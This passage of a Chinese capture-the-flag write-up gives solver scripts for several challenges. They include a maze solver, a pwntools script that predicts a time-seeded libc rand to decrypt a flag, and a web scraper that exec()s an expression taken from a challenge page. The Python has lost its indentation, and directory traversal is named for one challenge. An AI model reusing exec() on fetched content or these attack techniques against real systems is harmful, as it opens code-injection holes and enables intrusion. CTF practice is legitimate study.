maze = "*****++*********+******+*++******+++*****F*+*******+*+++*****+***++****+***+*****+***+*+***+++++++************"
pos = 5
move_map = {'w': -10, 's': 10, 'a': -1, 'd': 1}
for action in solution:
move = move_map[action]
while is_valid_move(maze, pos + move):
pos += move
return maze[pos] == 'F'
def main():
solution = solve_maze()
print(f"Found solution path: {solution}")
if verify_solution(solution):
print("Solution verified: Valid!")
else:
print("Solution verification failed!")
return
flag = "YLCTF{" + hashlib.md5(solution.encode()).hexdigest() + "}"
print("\nMaze visualization (10x10 grid):")
print(visualize_maze("*****++*********+******+*++******+++*****F*+*******+*+++*****+***++****+***+*****+***+*+***+++++++************"))
print("\nFinal flag:", flag)
if __name__ == "__main__":
main()
[Round 3] CASE
from pwn import *
import ctypes
import time
# 加载 libc
libc = ctypes.CDLL("libc.so.6")
# 连接到靶机
p = remote("challenge.yuanloo.com", 30037)
# 用于保存加密值
enc = []
for _ in range(43):
response = p.recvuntil(b',')
enc.append(response.strip().decode().rstrip(','))
print("Encrypted values:", enc)
enc_values = [int(x, 16) for x in enc]
# 用于保存解密的结果
decrypted = []
seed = int(time.time())
libc.srand(seed)
for i in range(len(enc_values)):
v5 = libc.rand()
original_char = (enc_values[i] ^ (v5 % 255))
# 反向映射字符
if 65 <= original_char <= 90: # A-Z
decrypted_char = chr((original_char + 52 - 65) % 26 + 65)
elif 97 <= original_char <= 122: # a-z
decrypted_char = chr((original_char + 84 - 97) % 26 + 97)
else:
decrypted_char = chr(original_char)
decrypted.append(decrypted_char)
# 输出解密结果
print("Decrypted value:", ''.join(decrypted))
# 关闭连接
p.close()
不知道具体的原理,要得到flag的话外面需要rot13内部需要rot7才能得到正确的flag,不太明白re,里面是根据uuid的特性得到的
Web
[Round 3] 404
/script.js有提示,然后
解密,最后在网页写个py交互一下
import requests
from bs4 import BeautifulSoup
session = requests.Session()
url = 'http://challenge.yuanloo.com:33968/ca.php'
response = session.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
pre_content = soup.find('pre').text.strip()
pre_content = pre_content.replace('$temp1', 'temp1').replace('$temp2', 'temp2').replace('$temp3', 'temp3').replace('$temp4', 'temp4').replace('$answer', 'answer')
pre_content = pre_content.replace('log', 'math.log').replace('sqrt', 'math.sqrt').replace('pow', 'math.pow').replace('sin', 'math.sin').replace('cos', 'math.cos').replace('tan', 'math.tan').replace('exp', 'math.exp').replace('abs', 'abs')
# 计算表达式
exec(pre_content)
# 输出最终答案,保留两位小数
final_answer = round(answer, 2)
print(f"答案: {final_answer:.2f}")
# 准备 POST 请求的数据
data = {
'user_answer': final_answer
}
post_url = 'http://challenge.yuanloo.com:33968/ca.php'
response = session.post(post_url, data=data)
print(f"POST 请求的响应: {response.text}")
[Round 3] PRead
目录穿越
